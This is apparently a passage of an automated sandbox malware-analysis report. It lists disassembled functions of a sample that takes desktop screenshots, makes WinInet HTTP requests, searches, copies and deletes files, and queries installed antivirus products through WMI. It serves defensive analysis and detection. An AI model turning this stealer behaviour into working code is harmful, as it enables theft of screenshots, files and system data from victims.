                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                                                                                                                                                                                                            • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                                                                            • API String ID: 2178766154-445461498
                                                                                                                                                                                                                            • Opcode ID: e612f58ce444cb8feb34317279a8f21faf52f4316bf0fd624547e4b148c88b5c
                                                                                                                                                                                                                            • Instruction ID: 633cccac4349ae0e6520617ab5d327c50858b66953caffa359f965ca5fd0ff30
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e612f58ce444cb8feb34317279a8f21faf52f4316bf0fd624547e4b148c88b5c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E6813771D0022DABCF20EB61DC49AC977B9BF08305F0190EAE549A3151DF79ABC98F94
                                                                                                                                                                                                                            Function 00411F2A Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 147windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00411F6B
                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00411F79
                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00411F86
                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00411F8D
                                                                                                                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00411F96
                                                                                                                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00411FA6
                                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00411FB3
                                                                                                                                                                                                                            • BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00411FCF
                                                                                                                                                                                                                            • GetHGlobalFromStream.COMBASE(?,?), ref: 0041201E
                                                                                                                                                                                                                            • GlobalLock.KERNEL32(?), ref: 00412027
                                                                                                                                                                                                                            • GlobalSize.KERNEL32(?), ref: 00412033
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                              • Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417663), ref: 0041050D
                                                                                                                                                                                                                              • Part of subcall function 00405482: lstrlenA.KERNEL32(?), ref: 00405519
                                                                                                                                                                                                                              • Part of subcall function 00405482: StrCmpCA.SHLWAPI(?,00436976,0043695B,00436957,0043694B), ref: 00405588
                                                                                                                                                                                                                              • Part of subcall function 00405482: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA
                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 00412091
                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 004120AC
                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 004120B5
                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 004120BD
                                                                                                                                                                                                                            • CloseWindow.USER32(00000000), ref: 004120C4
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: GlobalObject$CreateWindow$CompatibleDeleteSelectStreamlstrcpy$BitmapCloseDesktopFromInternetLockOpenRectReleaseSizelstrlen
                                                                                                                                                                                                                            • String ID: {A
                                                                                                                                                                                                                            • API String ID: 2610876673-1031812006
                                                                                                                                                                                                                            • Opcode ID: 7ee3c37e68eeb78f9f832e7fbaf2de79ef316f24f3bf4c5ac8bb4a66aa8c337d
                                                                                                                                                                                                                            • Instruction ID: 1d17374a284164e7c3f8b1b0926b1c833526ee7a057d4b180d112d4aa342f6cd
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7ee3c37e68eeb78f9f832e7fbaf2de79ef316f24f3bf4c5ac8bb4a66aa8c337d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FE51F672800208AFDF15EFA1ED499EEBF7AFF08315F045026FA01E2120D7359A95DB61
                                                                                                                                                                                                                            Function 0041C4B7 Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 440COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: /$UT
                                                                                                                                                                                                                            • API String ID: 0-1626504983
                                                                                                                                                                                                                            • Opcode ID: 375b76cf62abd5f7dd4df4683fbf8252338f38d1a5fa21a65283e4b32dc89bc6
                                                                                                                                                                                                                            • Instruction ID: 9787a365ec18c0bf1930f8717519833fdc736eeb0207a270142cd3a14faf4db2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 375b76cf62abd5f7dd4df4683fbf8252338f38d1a5fa21a65283e4b32dc89bc6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C026DB19442688BDF21DF64CC807EEBBB5AF45304F1440EAD949A7242D7389EC5CF99
                                                                                                                                                                                                                            Function 00406963 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 161networkfileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417663), ref: 0041050D
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                            • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?), ref: 004069DF
                                                                                                                                                                                                                            • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                                                                                                                                                                            • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                                                                                                                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
                                                                                                                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                                                                                                                                                                            • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
                                                                                                                                                                                                                            • InternetReadFile.WININET(?,?,000007CF,?), ref: 00406B40
                                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00406B50
                                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00406B5C
                                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00406B68
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
                                                                                                                                                                                                                            • String ID: @iA$ERROR$ERROR$GET
                                                                                                                                                                                                                            • API String ID: 3863758870-3546687611
                                                                                                                                                                                                                            • Opcode ID: 351cdc3c96884ed85ff636cdb7f7cb70b707f938f9ced068266bc9d1f4716f5d
                                                                                                                                                                                                                            • Instruction ID: d8bde7e051fe936688ae94f634ee4e08a5faa0caa340d4fa3fbcfbce63435b0b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 351cdc3c96884ed85ff636cdb7f7cb70b707f938f9ced068266bc9d1f4716f5d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1251A0B1A00229AFDF20AF20DC85AEEB7B9FB04344F0181F6F549B2191CA755EC59F84
                                                                                                                                                                                                                            Function 00401D80 Relevance: 25.0, APIs: 12, Strings: 2, Instructions: 529fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?,0043A9AC,0043A9B0,004369F3,004369F2,JyA,?,00000000), ref: 00401FA4
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,0043A9B4), ref: 00401FD7
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,0043A9B8), ref: 00401FF1
                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?,0043A9BC,0043A9C0,?,0043A9C4,004369F6), ref: 004020DD
                                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 004022C3
                                                                                                                                                                                                                              • Part of subcall function 00411D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DD2
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0041762B,004366D6), ref: 004105CA
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 00402336
                                                                                                                                                                                                                            • FindNextFileA.KERNEL32(?,?), ref: 004023A2
                                                                                                                                                                                                                            • FindClose.KERNEL32(?), ref: 004023B6
                                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 004025DC
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E72B,?,?,?), ref: 00407FC7
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E72B,?,?,?), ref: 00407FDE
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E72B,?,?,?), ref: 00407FF5
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E72B,?,?,?), ref: 0040800C
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E72B,?,?,?), ref: 00408034
                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0040264F
                                                                                                                                                                                                                              • Part of subcall function 00416ED9: Sleep.KERNEL32(000003E8,?,?), ref: 00416F40
                                                                                                                                                                                                                            • FindNextFileA.KERNEL32(?,?), ref: 004026C6
                                                                                                                                                                                                                            • FindClose.KERNEL32(?), ref: 004026DA
                                                                                                                                                                                                                              • Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417663), ref: 0041050D
                                                                                                                                                                                                                              • Part of subcall function 00416ED9: CreateThread.KERNEL32(00000000,00000000,00416E08,?,00000000,00000000), ref: 00416F78
                                                                                                                                                                                                                              • Part of subcall function 00416ED9: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F80
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 00411D67: GetFileAttributesA.KERNEL32(?,?,?,0040DA54,?,?,?), ref: 00411D6E
                                                                                                                                                                                                                              • Part of subcall function 00411C1F: GetSystemTime.KERNEL32(?,004366E2,?), ref: 00411C4E
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstNextlstrcat$AllocAttributesFolderHandleLocalObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                                                                                                                                                            • String ID: JyA$\*.*
                                                                                                                                                                                                                            • API String ID: 1475085387-813135727
                                                                                                                                                                                                                            • Opcode ID: f258c4cfcc6ffa8f46453eb5638c328eb33da40b3dae3fe0602e1876ac3a8531
                                                                                                                                                                                                                            • Instruction ID: 533864eee019f00bdfe02d8649da9cc59868becad79d5191aa10b83f690668f1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f258c4cfcc6ffa8f46453eb5638c328eb33da40b3dae3fe0602e1876ac3a8531
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4F32DC71A001299BCF21FB25DD4A7CD7375AF04308F5151EAA548771A2CBB86FC98F89
                                                                                                                                                                                                                            Function 0041196C Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 114comCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 00411973
                                                                                                                                                                                                                            • CoInitializeEx.OLE32(00000000,00000000,00000030,00413FA7,?,AV: ,004368CC,Install Date: ,004368B8,00000000,Windows: ,004368A8,Work Dir: In memory,00436890), ref: 00411982
                                                                                                                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411993
                                                                                                                                                                                                                            • CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119AD
                                                                                                                                                                                                                            • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004119E3
                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00411A32
                                                                                                                                                                                                                              • Part of subcall function 00411D17: LocalAlloc.KERNEL32(00000040,00000005,?,?,00411A55,?), ref: 00411D1F
                                                                                                                                                                                                                              • Part of subcall function 00411D17: CharToOemW.USER32(?,00000000), ref: 00411D2B
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00411A60
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: InitializeVariant$AllocBlanketCharClearCreateH_prolog3_catchInitInstanceLocalProxySecuritylstrcpy
                                                                                                                                                                                                                            • String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                                                                                                                                                            • API String ID: 4288110179-315474579
                                                                                                                                                                                                                            • Opcode ID: 7f379c790eb099f24fc055ea34a0325628612ab894480d039f292940774d93bd
                                                                                                                                                                                                                            • Instruction ID: 3fda5078456e7a0d609a00957094a3acbddb435200cc30907b6e8efe348fab49
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7f379c790eb099f24fc055ea34a0325628612ab894480d039f292940774d93bd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E2315471A40209BBCB20DB91DC49EEFBF7DEFC9B10F20425EF211A61A0C6795941CB68
                                                                                                                                                                                                                            Function 0041547D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 140stringfileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 004154AA
                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 004154C1
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00436A88), ref: 004154E2
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00436A8C), ref: 004154FC
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?), ref: 0041554D
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?), ref: 00415560
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 00415574
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 00415587
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,00436A90), ref: 00415599
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 004155AD
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E72B,?,?,?), ref: 00407FC7
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E72B,?,?,?), ref: 00407FDE
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E72B,?,?,?), ref: 00407FF5
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E72B,?,?,?), ref: 0040800C
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E72B,?,?,?), ref: 00408034
                                                                                                                                                                                                                              • Part of subcall function 00416ED9: CreateThread.KERNEL32(00000000,00000000,00416E08,?,00000000,00000000), ref: 00416F78
                                                                                                                                                                                                                              • Part of subcall function 00416ED9: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F80
                                                                                                                                                                                                                            • FindNextFileA.KERNEL32(?,?), ref: 00415663
                                                                                                                                                                                                                            • FindClose.KERNEL32(?), ref: 00415677
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
